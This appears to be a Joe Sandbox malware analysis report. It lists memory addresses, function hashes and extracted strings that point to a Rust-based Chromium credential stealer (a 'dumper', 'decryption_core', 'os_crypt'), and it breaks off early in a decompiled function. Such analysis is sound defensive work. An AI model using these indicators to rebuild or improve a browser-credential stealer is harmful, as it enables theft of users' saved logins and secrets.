                                                                                          0x7ff768b84d2b
                                                                                          0x7ff768b84d3f
                                                                                          0x7ff768b84d44
                                                                                          0x7ff768b84d49
                                                                                          0x7ff768b84d60
                                                                                          0x7ff768b84d65
                                                                                          0x7ff768b84d6d
                                                                                          0x7ff768b84d75
                                                                                          0x7ff768b84d78
                                                                                          0x7ff768b84d8b
                                                                                          0x7ff768b84d9f
                                                                                          0x7ff768b84da9
                                                                                          0x7ff768b84dae
                                                                                          0x7ff768b84db1
                                                                                          0x7ff768b84db6
                                                                                          0x7ff768b84dd3
                                                                                          0x7ff768b84de0
                                                                                          0x7ff768b84de7
                                                                                          0x7ff768b84dec
                                                                                          0x7ff768b84df4
                                                                                          0x7ff768b84df7
                                                                                          0x7ff768b84dfb
                                                                                          0x7ff768b84e00
                                                                                          0x7ff768b84e05
                                                                                          0x7ff768b84e08
                                                                                          0x7ff768b84e0c
                                                                                          0x7ff768b84e2f
                                                                                          0x7ff768b84e3b
                                                                                          0x7ff768b84e46
                                                                                          0x7ff768b84e51
                                                                                          0x7ff768b84e5e
                                                                                          0x7ff768b84e72
                                                                                          0x7ff768b84e77
                                                                                          0x7ff768b84e7c
                                                                                          0x7ff768b84e93
                                                                                          0x7ff768b84e98
                                                                                          0x7ff768b84ea0
                                                                                          0x7ff768b84ea8
                                                                                          0x7ff768b84eab
                                                                                          0x7ff768b84ebe
                                                                                          0x7ff768b84ed2
                                                                                          0x7ff768b84edc
                                                                                          0x7ff768b84ee1
                                                                                          0x7ff768b84ee4
                                                                                          0x7ff768b84ee9
                                                                                          0x7ff768b84f06
                                                                                          0x7ff768b84f13
                                                                                          0x7ff768b84f1a
                                                                                          0x7ff768b84f1f
                                                                                          0x7ff768b84f27
                                                                                          0x7ff768b84f2a
                                                                                          0x7ff768b84f2e
                                                                                          0x7ff768b84f33
                                                                                          0x7ff768b84f38
                                                                                          0x7ff768b84f3b
                                                                                          0x7ff768b84f3f
                                                                                          0x7ff768b84f62
                                                                                          0x7ff768b84f6e
                                                                                          0x7ff768b84f79
                                                                                          0x7ff768b84f84
                                                                                          0x7ff768b84f91
                                                                                          0x7ff768b84fa5
                                                                                          0x7ff768b84faa
                                                                                          0x7ff768b84faf
                                                                                          0x7ff768b84fcf
                                                                                          0x7ff768b84fd8
                                                                                          0x7ff768b84fdd
                                                                                          0x7ff768b84fe5
                                                                                          0x7ff768b84fed
                                                                                          0x7ff768b84ff0
                                                                                          0x7ff768b84ff4
                                                                                          0x7ff768b84ff8
                                                                                          0x7ff768b8500b
                                                                                          0x7ff768b8501f
                                                                                          0x7ff768b85029
                                                                                          0x7ff768b8502e
                                                                                          0x7ff768b85031
                                                                                          0x7ff768b85036
                                                                                          0x7ff768b85053
                                                                                          0x7ff768b85060
                                                                                          0x7ff768b85067
                                                                                          0x7ff768b8506c
                                                                                          0x7ff768b85074
                                                                                          0x7ff768b85077
                                                                                          0x7ff768b8507b
                                                                                          0x7ff768b85080
                                                                                          0x7ff768b85085
                                                                                          0x7ff768b85088
                                                                                          0x7ff768b8508c
                                                                                          0x7ff768b850af
                                                                                          0x7ff768b850bb
                                                                                          0x7ff768b850c6
                                                                                          0x7ff768b850d1
                                                                                          0x7ff768b850de
                                                                                          0x7ff768b850f2
                                                                                          0x7ff768b850f7
                                                                                          0x7ff768b850fc
                                                                                          0x7ff768b8510d
                                                                                          0x7ff768b85112
                                                                                          0x7ff768b8511a
                                                                                          0x7ff768b85122
                                                                                          0x7ff768b85124
                                                                                          0x7ff768b85137
                                                                                          0x7ff768b8514b
                                                                                          0x7ff768b85155
                                                                                          0x7ff768b8515a
                                                                                          0x7ff768b8515d
                                                                                          0x7ff768b85162
                                                                                          0x7ff768b8517f
                                                                                          0x7ff768b8518c
                                                                                          0x7ff768b85193
                                                                                          0x7ff768b85198
                                                                                          0x7ff768b851a0
                                                                                          0x7ff768b851a3
                                                                                          0x7ff768b851a7
                                                                                          0x7ff768b851ac
                                                                                          0x7ff768b851b1
                                                                                          0x7ff768b851b4
                                                                                          0x7ff768b851b8
                                                                                          0x7ff768b851db
                                                                                          0x7ff768b851e7
                                                                                          0x7ff768b851f2
                                                                                          0x7ff768b851fd
                                                                                          0x7ff768b8520a
                                                                                          0x7ff768b8521e
                                                                                          0x7ff768b85223
                                                                                          0x7ff768b85228
                                                                                          0x7ff768b8523f
                                                                                          0x7ff768b85244
                                                                                          0x7ff768b8524c
                                                                                          0x7ff768b85254
                                                                                          0x7ff768b85257
                                                                                          0x7ff768b8526a
                                                                                          0x7ff768b8527e
                                                                                          0x7ff768b85288
                                                                                          0x7ff768b8528d
                                                                                          0x7ff768b85290
                                                                                          0x7ff768b85295
                                                                                          0x7ff768b852b2
                                                                                          0x7ff768b852bf
                                                                                          0x7ff768b852c6
                                                                                          0x7ff768b852cb
                                                                                          0x7ff768b852d3
                                                                                          0x7ff768b852d6
                                                                                          0x7ff768b852da
                                                                                          0x7ff768b852df
                                                                                          0x7ff768b852e4
                                                                                          0x7ff768b852e7
                                                                                          0x7ff768b852eb
                                                                                          0x7ff768b8530e
                                                                                          0x7ff768b8531a
                                                                                          0x7ff768b85325
                                                                                          0x7ff768b85330
                                                                                          0x7ff768b8533d
                                                                                          0x7ff768b85351
                                                                                          0x7ff768b85356
                                                                                          0x7ff768b8535b
                                                                                          0x7ff768b85378
                                                                                          0x7ff768b8537d
                                                                                          0x7ff768b85385
                                                                                          0x7ff768b8538d
                                                                                          0x7ff768b85390
                                                                                          0x7ff768b85393
                                                                                          0x7ff768b853a6
                                                                                          0x7ff768b853ba
                                                                                          0x7ff768b853c4
                                                                                          0x7ff768b853c9
                                                                                          0x7ff768b853cc
                                                                                          0x7ff768b853d1
                                                                                          0x7ff768b853ee
                                                                                          0x7ff768b853fb
                                                                                          0x7ff768b85402
                                                                                          0x7ff768b85407
                                                                                          0x7ff768b8540f
                                                                                          0x7ff768b85412
                                                                                          0x7ff768b85416
                                                                                          0x7ff768b8541b
                                                                                          0x7ff768b85420
                                                                                          0x7ff768b85423
                                                                                          0x7ff768b85427
                                                                                          0x7ff768b8544a
                                                                                          0x7ff768b85456
                                                                                          0x7ff768b85461
                                                                                          0x7ff768b8546c
                                                                                          0x7ff768b85479
                                                                                          0x7ff768b8548d
                                                                                          0x7ff768b85492
                                                                                          0x7ff768b85497
                                                                                          0x7ff768b854b8
                                                                                          0x7ff768b854bd
                                                                                          0x7ff768b854c5
                                                                                          0x7ff768b854cd
                                                                                          0x7ff768b854d0
                                                                                          0x7ff768b854d4
                                                                                          0x7ff768b854e7
                                                                                          0x7ff768b854fb
                                                                                          0x7ff768b85505
                                                                                          0x7ff768b8550a
                                                                                          0x7ff768b8550d
                                                                                          0x7ff768b85512
                                                                                          0x7ff768b8552a
                                                                                          0x7ff768b8552f
                                                                                          0x7ff768b8553c
                                                                                          0x7ff768b85543
                                                                                          0x7ff768b85548
                                                                                          0x7ff768b85550
                                                                                          0x7ff768b85553
                                                                                          0x7ff768b85557
                                                                                          0x7ff768b8555c
                                                                                          0x7ff768b85561
                                                                                          0x7ff768b85564
                                                                                          0x7ff768b85568
                                                                                          0x7ff768b8558b
                                                                                          0x7ff768b85590
                                                                                          0x7ff768b85597
                                                                                          0x7ff768b855a2
                                                                                          0x7ff768b855ad
                                                                                          0x7ff768b855ba
                                                                                          0x7ff768b855ce
                                                                                          0x7ff768b855d3
                                                                                          0x7ff768b855d8
                                                                                          0x7ff768b855dd
                                                                                          0x7ff768b855e0
                                                                                          0x7ff768b855e8
                                                                                          0x7ff768b855f4
                                                                                          0x7ff768b8560c
                                                                                          0x7ff768b85618
                                                                                          0x7ff768b85660
                                                                                          0x7ff768b85664
                                                                                          0x7ff768b8567e
                                                                                          0x7ff768b85682
                                                                                          0x7ff768b85693
                                                                                          0x7ff768b85699
                                                                                          0x7ff768b856a7
                                                                                          0x7ff768b856bb
                                                                                          0x7ff768b856c6
                                                                                          0x7ff768b856d2
                                                                                          0x7ff768b856d7
                                                                                          0x7ff768b856df
                                                                                          0x7ff768b856e7
                                                                                          0x7ff768b856ef
                                                                                          0x7ff768b856fa
                                                                                          0x7ff768b856fe
                                                                                          0x7ff768b85711
                                                                                          0x7ff768b85725
                                                                                          0x7ff768b8572f
                                                                                          0x7ff768b85734
                                                                                          0x7ff768b85737
                                                                                          0x7ff768b8573c
                                                                                          0x7ff768b85754
                                                                                          0x7ff768b85759
                                                                                          0x7ff768b85766
                                                                                          0x7ff768b8576d
                                                                                          0x7ff768b85772
                                                                                          0x7ff768b8577a
                                                                                          0x7ff768b8577d
                                                                                          0x7ff768b85781
                                                                                          0x7ff768b85786
                                                                                          0x7ff768b8578b
                                                                                          0x7ff768b8578e
                                                                                          0x7ff768b85792
                                                                                          0x7ff768b857b5
                                                                                          0x7ff768b857ba
                                                                                          0x7ff768b857c1
                                                                                          0x7ff768b857cc
                                                                                          0x7ff768b857d7
                                                                                          0x7ff768b857e4
                                                                                          0x7ff768b857f8
                                                                                          0x7ff768b857fd
                                                                                          0x7ff768b85802
                                                                                          0x7ff768b85807
                                                                                          0x7ff768b8580a
                                                                                          0x7ff768b85812
                                                                                          0x7ff768b8581e
                                                                                          0x7ff768b85836
                                                                                          0x7ff768b85842
                                                                                          0x7ff768b8588a
                                                                                          0x7ff768b8588e
                                                                                          0x7ff768b858a8
                                                                                          0x7ff768b858ac
                                                                                          0x7ff768b858bd
                                                                                          0x7ff768b858c3
                                                                                          0x7ff768b858d1
                                                                                          0x7ff768b858e1
                                                                                          0x7ff768b858ee
                                                                                          0x7ff768b858f3
                                                                                          0x7ff768b858fb
                                                                                          0x7ff768b85903
                                                                                          0x7ff768b8590b
                                                                                          0x7ff768b85916
                                                                                          0x7ff768b8591a
                                                                                          0x7ff768b8592d
                                                                                          0x7ff768b85941
                                                                                          0x7ff768b8594b
                                                                                          0x7ff768b85950
                                                                                          0x7ff768b85953
                                                                                          0x7ff768b85958
                                                                                          0x7ff768b85970
                                                                                          0x7ff768b85975
                                                                                          0x7ff768b85982
                                                                                          0x7ff768b85989
                                                                                          0x7ff768b8598e
                                                                                          0x7ff768b85996
                                                                                          0x7ff768b85999
                                                                                          0x7ff768b8599d
                                                                                          0x7ff768b859a2
                                                                                          0x7ff768b859a7
                                                                                          0x7ff768b859aa
                                                                                          0x7ff768b859ae
                                                                                          0x7ff768b859d1
                                                                                          0x7ff768b859d6
                                                                                          0x7ff768b859dd
                                                                                          0x7ff768b859e8
                                                                                          0x7ff768b859f3
                                                                                          0x7ff768b85a00
                                                                                          0x7ff768b85a14
                                                                                          0x7ff768b85a19
                                                                                          0x7ff768b85a1e
                                                                                          0x7ff768b85a23
                                                                                          0x7ff768b85a26
                                                                                          0x7ff768b85a2e
                                                                                          0x7ff768b85a3a
                                                                                          0x7ff768b85a52
                                                                                          0x7ff768b85a5e
                                                                                          0x7ff768b85ac4
                                                                                          0x7ff768b85ac8
                                                                                          0x7ff768b85ad9
                                                                                          0x7ff768b85adf
                                                                                          0x7ff768b85aed
                                                                                          0x7ff768b85b01
                                                                                          0x7ff768b85b0c
                                                                                          0x7ff768b85b18
                                                                                          0x7ff768b85b1d
                                                                                          0x7ff768b85b25
                                                                                          0x7ff768b85b2d
                                                                                          0x7ff768b85b35
                                                                                          0x7ff768b85b40
                                                                                          0x7ff768b85b44
                                                                                          0x7ff768b85b57
                                                                                          0x7ff768b85b6b
                                                                                          0x7ff768b85b75
                                                                                          0x7ff768b85b7a
                                                                                          0x7ff768b85b7d
                                                                                          0x7ff768b85b82
                                                                                          0x7ff768b85b9f
                                                                                          0x7ff768b85bac
                                                                                          0x7ff768b85bb3
                                                                                          0x7ff768b85bb8
                                                                                          0x7ff768b85bc0
                                                                                          0x7ff768b85bc3
                                                                                          0x7ff768b85bc7
                                                                                          0x7ff768b85bcc
                                                                                          0x7ff768b85bd1
                                                                                          0x7ff768b85bd4
                                                                                          0x7ff768b85bd8
                                                                                          0x7ff768b85bfb
                                                                                          0x7ff768b85c07
                                                                                          0x7ff768b85c12
                                                                                          0x7ff768b85c1d
                                                                                          0x7ff768b85c2a
                                                                                          0x7ff768b85c3e
                                                                                          0x7ff768b85c43
                                                                                          0x7ff768b85c48
                                                                                          0x7ff768b85c5f
                                                                                          0x7ff768b85c64
                                                                                          0x7ff768b85c6c
                                                                                          0x7ff768b85c74
                                                                                          0x7ff768b85c77
                                                                                          0x7ff768b85c8a
                                                                                          0x7ff768b85c9e
                                                                                          0x7ff768b85ca8
                                                                                          0x7ff768b85cad
                                                                                          0x7ff768b85cb0
                                                                                          0x7ff768b85cb5
                                                                                          0x7ff768b85cd2
                                                                                          0x7ff768b85cdf
                                                                                          0x7ff768b85ce6
                                                                                          0x7ff768b85ceb
                                                                                          0x7ff768b85cf3
                                                                                          0x7ff768b85cf6
                                                                                          0x7ff768b85cfa
                                                                                          0x7ff768b85cff
                                                                                          0x7ff768b85d04
                                                                                          0x7ff768b85d07
                                                                                          0x7ff768b85d0b
                                                                                          0x7ff768b85d2e
                                                                                          0x7ff768b85d3a
                                                                                          0x7ff768b85d45
                                                                                          0x7ff768b85d50
                                                                                          0x7ff768b85d5d
                                                                                          0x7ff768b85d71
                                                                                          0x7ff768b85d76
                                                                                          0x7ff768b85d7b
                                                                                          0x7ff768b85d92
                                                                                          0x7ff768b85d97
                                                                                          0x7ff768b85d9f
                                                                                          0x7ff768b85da7
                                                                                          0x7ff768b85daa
                                                                                          0x7ff768b85dbd
                                                                                          0x7ff768b85dd1
                                                                                          0x7ff768b85ddb
                                                                                          0x7ff768b85de0
                                                                                          0x7ff768b85de3
                                                                                          0x7ff768b85de8
                                                                                          0x7ff768b85e05
                                                                                          0x7ff768b85e12
                                                                                          0x7ff768b85e19
                                                                                          0x7ff768b85e1e
                                                                                          0x7ff768b85e26
                                                                                          0x7ff768b85e29
                                                                                          0x7ff768b85e2d
                                                                                          0x7ff768b85e32
                                                                                          0x7ff768b85e37
                                                                                          0x7ff768b85e3a
                                                                                          0x7ff768b85e3e
                                                                                          0x7ff768b85e61
                                                                                          0x7ff768b85e6d
                                                                                          0x7ff768b85e78
                                                                                          0x7ff768b85e83
                                                                                          0x7ff768b85e90
                                                                                          0x7ff768b85ea4
                                                                                          0x7ff768b85ea9
                                                                                          0x7ff768b85eae
                                                                                          0x7ff768b85ecd
                                                                                          0x7ff768b85ed2
                                                                                          0x7ff768b85eda
                                                                                          0x7ff768b85ee2
                                                                                          0x7ff768b85ee5
                                                                                          0x7ff768b85ee8
                                                                                          0x7ff768b85efb
                                                                                          0x7ff768b85f0f
                                                                                          0x7ff768b85f19
                                                                                          0x7ff768b85f1e
                                                                                          0x7ff768b85f21
                                                                                          0x7ff768b85f26
                                                                                          0x7ff768b85f43
                                                                                          0x7ff768b85f50
                                                                                          0x7ff768b85f57
                                                                                          0x7ff768b85f5c
                                                                                          0x7ff768b85f64
                                                                                          0x7ff768b85f67
                                                                                          0x7ff768b85f6b
                                                                                          0x7ff768b85f70
                                                                                          0x7ff768b85f75
                                                                                          0x7ff768b85f78
                                                                                          0x7ff768b85f7c
                                                                                          0x7ff768b85f9f
                                                                                          0x7ff768b85fab
                                                                                          0x7ff768b85fb6
                                                                                          0x7ff768b85fc1
                                                                                          0x7ff768b85fce
                                                                                          0x7ff768b85fe2
                                                                                          0x7ff768b85fe7
                                                                                          0x7ff768b85fec
                                                                                          0x7ff768b8600a
                                                                                          0x7ff768b8600f
                                                                                          0x7ff768b86017
                                                                                          0x7ff768b8601f
                                                                                          0x7ff768b86023
                                                                                          0x7ff768b86025
                                                                                          0x7ff768b86038
                                                                                          0x7ff768b8604c
                                                                                          0x7ff768b86056
                                                                                          0x7ff768b8605b
                                                                                          0x7ff768b8605e
                                                                                          0x7ff768b86063
                                                                                          0x7ff768b86080
                                                                                          0x7ff768b8608d
                                                                                          0x7ff768b86094
                                                                                          0x7ff768b86099
                                                                                          0x7ff768b860a1
                                                                                          0x7ff768b860a4
                                                                                          0x7ff768b860a8
                                                                                          0x7ff768b860ad
                                                                                          0x7ff768b860b2
                                                                                          0x7ff768b860b5
                                                                                          0x7ff768b860b9
                                                                                          0x7ff768b860dc
                                                                                          0x7ff768b860e8
                                                                                          0x7ff768b860f3
                                                                                          0x7ff768b860fe
                                                                                          0x7ff768b8610b
                                                                                          0x7ff768b8611f
                                                                                          0x7ff768b86124
                                                                                          0x7ff768b86129
                                                                                          0x7ff768b86147
                                                                                          0x7ff768b8615e
                                                                                          0x7ff768b86163
                                                                                          0x7ff768b8616b
                                                                                          0x7ff768b86173
                                                                                          0x7ff768b86176
                                                                                          0x7ff768b8617c
                                                                                          0x7ff768b86180
                                                                                          0x7ff768b86193
                                                                                          0x7ff768b861a7
                                                                                          0x7ff768b861b1
                                                                                          0x7ff768b861b6
                                                                                          0x7ff768b861b9
                                                                                          0x7ff768b861be
                                                                                          0x7ff768b861db
                                                                                          0x7ff768b861e8
                                                                                          0x7ff768b861ef
                                                                                          0x7ff768b861f4
                                                                                          0x7ff768b861fc
                                                                                          0x7ff768b861ff
                                                                                          0x7ff768b86203
                                                                                          0x7ff768b86208
                                                                                          0x7ff768b8620d
                                                                                          0x7ff768b86210
                                                                                          0x7ff768b86214
                                                                                          0x7ff768b86237
                                                                                          0x7ff768b86243
                                                                                          0x7ff768b8624e
                                                                                          0x7ff768b86259
                                                                                          0x7ff768b86266
                                                                                          0x7ff768b8627a
                                                                                          0x7ff768b8627f
                                                                                          0x7ff768b86284
                                                                                          0x7ff768b862a1
                                                                                          0x7ff768b862a6
                                                                                          0x7ff768b862ae
                                                                                          0x7ff768b862b6
                                                                                          0x7ff768b862ba
                                                                                          0x7ff768b862bc
                                                                                          0x7ff768b862cf
                                                                                          0x7ff768b862e3
                                                                                          0x7ff768b862ed
                                                                                          0x7ff768b862f2
                                                                                          0x7ff768b862f5
                                                                                          0x7ff768b862fa
                                                                                          0x7ff768b86317
                                                                                          0x7ff768b86324
                                                                                          0x7ff768b8632b
                                                                                          0x7ff768b86330
                                                                                          0x7ff768b86338
                                                                                          0x7ff768b8633b
                                                                                          0x7ff768b8633f
                                                                                          0x7ff768b86344
                                                                                          0x7ff768b86349
                                                                                          0x7ff768b8634c
                                                                                          0x7ff768b86350
                                                                                          0x7ff768b86373
                                                                                          0x7ff768b8637f
                                                                                          0x7ff768b8638a
                                                                                          0x7ff768b86395
                                                                                          0x7ff768b863a2
                                                                                          0x7ff768b863b6
                                                                                          0x7ff768b863bb
                                                                                          0x7ff768b863c0
                                                                                          0x7ff768b863dd
                                                                                          0x7ff768b863e2
                                                                                          0x7ff768b863ea
                                                                                          0x7ff768b863f2
                                                                                          0x7ff768b863f6
                                                                                          0x7ff768b863f8
                                                                                          0x7ff768b8640b
                                                                                          0x7ff768b8641f
                                                                                          0x7ff768b86429
                                                                                          0x7ff768b8642e
                                                                                          0x7ff768b86431
                                                                                          0x7ff768b86436
                                                                                          0x7ff768b86453
                                                                                          0x7ff768b86460
                                                                                          0x7ff768b86467
                                                                                          0x7ff768b8646c
                                                                                          0x7ff768b86474
                                                                                          0x7ff768b86477
                                                                                          0x7ff768b8647b
                                                                                          0x7ff768b86480
                                                                                          0x7ff768b86485
                                                                                          0x7ff768b86488
                                                                                          0x7ff768b8648c
                                                                                          0x7ff768b864af
                                                                                          0x7ff768b864bb
                                                                                          0x7ff768b864c6
                                                                                          0x7ff768b864d1
                                                                                          0x7ff768b864de
                                                                                          0x7ff768b864f2
                                                                                          0x7ff768b864f7
                                                                                          0x7ff768b864fc
                                                                                          0x7ff768b8651a
                                                                                          0x7ff768b86531
                                                                                          0x7ff768b86536
                                                                                          0x7ff768b8653e
                                                                                          0x7ff768b86546
                                                                                          0x7ff768b86549
                                                                                          0x7ff768b8654f
                                                                                          0x7ff768b86553
                                                                                          0x7ff768b86566
                                                                                          0x7ff768b8657a
                                                                                          0x7ff768b86584
                                                                                          0x7ff768b86589
                                                                                          0x7ff768b8658c
                                                                                          0x7ff768b86591
                                                                                          0x7ff768b865ae
                                                                                          0x7ff768b865bb
                                                                                          0x7ff768b865c2
                                                                                          0x7ff768b865c7
                                                                                          0x7ff768b865cf
                                                                                          0x7ff768b865d2
                                                                                          0x7ff768b865d6
                                                                                          0x7ff768b865db
                                                                                          0x7ff768b865e0
                                                                                          0x7ff768b865e3
                                                                                          0x7ff768b865e7
                                                                                          0x7ff768b8660a
                                                                                          0x7ff768b86616
                                                                                          0x7ff768b86621
                                                                                          0x7ff768b8662c
                                                                                          0x7ff768b86639
                                                                                          0x7ff768b8664d
                                                                                          0x7ff768b86652
                                                                                          0x7ff768b86657
                                                                                          0x7ff768b8667c
                                                                                          0x7ff768b86681
                                                                                          0x7ff768b86689
                                                                                          0x7ff768b86691
                                                                                          0x7ff768b86694
                                                                                          0x7ff768b86697
                                                                                          0x7ff768b8669a
                                                                                          0x7ff768b866ad
                                                                                          0x7ff768b866c1
                                                                                          0x7ff768b866cb
                                                                                          0x7ff768b866d0
                                                                                          0x7ff768b866d3
                                                                                          0x7ff768b866d8
                                                                                          0x7ff768b866f5
                                                                                          0x7ff768b86702
                                                                                          0x7ff768b86709
                                                                                          0x7ff768b8670e
                                                                                          0x7ff768b86716
                                                                                          0x7ff768b86719
                                                                                          0x7ff768b8671d
                                                                                          0x7ff768b86722
                                                                                          0x7ff768b86727
                                                                                          0x7ff768b8672a
                                                                                          0x7ff768b8672e
                                                                                          0x7ff768b86751
                                                                                          0x7ff768b8675d
                                                                                          0x7ff768b86768
                                                                                          0x7ff768b86773
                                                                                          0x7ff768b86780
                                                                                          0x7ff768b86794
                                                                                          0x7ff768b86799
                                                                                          0x7ff768b8679e
                                                                                          0x7ff768b867b8
                                                                                          0x7ff768b867bd
                                                                                          0x7ff768b867c5
                                                                                          0x7ff768b867cd
                                                                                          0x7ff768b867d0
                                                                                          0x7ff768b867d2
                                                                                          0x7ff768b867e5

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID: LOCALAPPDATAsrc\chromium\dumper.rs$Overflow when calculating number of chunks in inputC:\Users\user\.cargo\registry\src\github.com-1ecc6299db9ec823\base64-0.13.1\src\decode.rs$UNKNOWNTRUEFALSEsrc\chromium\decryption_core.rs$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$decoded length calculation overflow$lumn out of bounds$os_crypt$os_cryptstruct LocalStatestruct LocalState with 1 element$rc\github.com-1ecc6299db9ec823\ctr-0.8.0\src\lib.rs$uplay\$}3i
                                                                                          • API String ID: 3298025750-918602926
                                                                                          • Opcode ID: 9b2bd29a7475b1cb0c9d7a3c8c2e23197280eecfebd0468701f7109c06a362ce
                                                                                          • Instruction ID: 1fcdd2116499addc75411edd4bc95409dc45d55c501807173cfeae954f1f6c0a
                                                                                          • Opcode Fuzzy Hash: 9b2bd29a7475b1cb0c9d7a3c8c2e23197280eecfebd0468701f7109c06a362ce
                                                                                          • Instruction Fuzzy Hash: 40047B72618BC2C5E6609B15E4443EAF3A4FF88B84F845236EA9D03B99DF3CD185CB54
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B82CD8 Relevance: 127.9, APIs: 76, Strings: 6, Instructions: 4938memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID: LOCALAPPDATAsrc\chromium\dumper.rs$User Dat$lumn out of bounds$rc\github.com-1ecc6299db9ec823\ctr-0.8.0\src\lib.rs$uplay\$}3i
                                                                                          • API String ID: 3298025750-982834318
                                                                                          • Opcode ID: eacfda4256f5a81a77d3ab743a8307d0e8346bea47f64a23a59cd5887b3e55d6
                                                                                          • Instruction ID: 71d9189fa306fb99c019e8c02a9b13e911bee0f69cee5ecc93fbafb1b3e4e132
                                                                                          • Opcode Fuzzy Hash: eacfda4256f5a81a77d3ab743a8307d0e8346bea47f64a23a59cd5887b3e55d6
                                                                                          • Instruction Fuzzy Hash: 2DC37A72A18BC2C5E6619B14E4403EAF3A4FF88B94F849236EA9D03B95DF3CD185C754
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768C6C090 Relevance: 124.8, APIs: 64, Strings: 6, Instructions: 2298memoryCOMMONCrypto
                                                                                          Download Yara Rule
                                                                                          C-Code - Quality: 18%
                                                                                          			E00007FF77FF768C6C090(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __ebp, unsigned long long __rax, unsigned long long __rcx, signed int __rdx, void* __r10) {
				WCHAR* _t592;
				void* _t593;
				signed int _t609;
				void* _t621;
				signed char _t633;
				int _t660;
				int _t669;
				int _t681;
				void* _t690;
				signed int _t714;
				signed int _t782;
				signed int _t803;
				signed int _t816;
				void* _t836;
				signed long long _t846;
				void* _t847;
				void* _t851;
				void* _t852;
				unsigned long long _t856;
				void* _t857;
				unsigned long long _t861;
				unsigned long long _t863;
				unsigned long long _t867;
				void* _t882;
				unsigned long long _t913;
				void* _t935;
				void* _t957;
				unsigned long long _t1001;
				long long _t1003;
				signed long long _t1004;
				void* _t1007;
				signed long long _t1030;
				signed long long _t1032;
				unsigned long long _t1036;
				signed long long _t1037;
				unsigned long long _t1038;
				signed short* _t1048;
				unsigned long long _t1049;
				signed int _t1051;
				unsigned long long _t1053;
				signed long long _t1054;
				signed long long _t1056;
				unsigned long long _t1058;
				signed long long _t1059;
				signed long long _t1061;
				unsigned long long _t1064;
				long long* _t1065;
				long long* _t1069;
				void* _t1072;
				signed long long _t1074;
				unsigned long long _t1080;
				signed long long _t1084;
				signed char* _t1092;
				unsigned long long _t1098;
				unsigned long long* _t1101;
				unsigned long long _t1108;
				void* _t1110;
				signed int _t1111;
				unsigned long long _t1113;
				unsigned long long _t1114;
				unsigned long long _t1117;
				unsigned long long* _t1123;
				intOrPtr _t1139;
				intOrPtr _t1140;
				intOrPtr _t1158;
				unsigned long long _t1166;
				void* _t1167;
				signed char* _t1182;
				signed char* _t1183;
				unsigned long long _t1213;
				void* _t1230;
				unsigned long long _t1232;
				signed long long _t1236;
				unsigned long long _t1246;
				unsigned long long* _t1251;
				void* _t1253;
				unsigned long long _t1260;
				signed long long _t1261;
				unsigned long long _t1263;
				signed long long _t1272;
				signed long long _t1275;
				unsigned long long _t1284;
				unsigned long long _t1287;
				signed long long _t1301;
				signed long long _t1306;
				signed long long _t1309;
				signed long long _t1314;
				long _t1315;
				intOrPtr _t1319;
				intOrPtr _t1320;
				void* _t1325;
				unsigned long long _t1338;
				signed long long _t1342;
				intOrPtr _t1343;
				unsigned long long _t1345;
				void* _t1349;
				unsigned long long _t1352;
				signed long long _t1355;
				unsigned long long _t1357;
				unsigned long long _t1361;
				signed long long _t1362;
				signed long long _t1365;
				unsigned long long _t1366;
				signed long long _t1367;
				unsigned long long _t1370;
				signed long long _t1371;
				long _t1375;
				unsigned long long* _t1376;
				void* _t1378;
				void* _t1379;
				unsigned long long _t1402;
				signed long long _t1411;
				void* _t1412;
				void* _t1413;
				unsigned long long _t1421;
				void* _t1422;
				void* _t1423;
				WCHAR* _t1437;
				void* _t1439;
				unsigned long long _t1442;
				void* _t1443;
				unsigned long long _t1450;
				unsigned long long _t1454;
				void* _t1456;
				signed long long _t1459;
				signed long long _t1460;
				unsigned long long _t1463;
				void* _t1466;
				long _t1467;
				intOrPtr _t1469;
				unsigned long long _t1480;
				unsigned long long _t1481;
				void* _t1484;
				unsigned long long _t1486;
				int _t1489;
				unsigned long long _t1490;
				unsigned long long _t1494;
				signed long long _t1499;
				unsigned long long _t1500;
				unsigned long long _t1502;

				asm("ud2");
				asm("ud2");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t1379 = _t1378 - 0x678;
				_t1376 = _t1379 + 0x80;
				asm("movdqa [ebp+0x5e0], xmm7");
				asm("movdqa [ebp+0x5d0], xmm6");
				_t1376[0xb9] = 0xfffffffe;
				_t1376[0x9e] = __rcx;
				_t1117 =  *((intOrPtr*)(__rdx + 0x50));
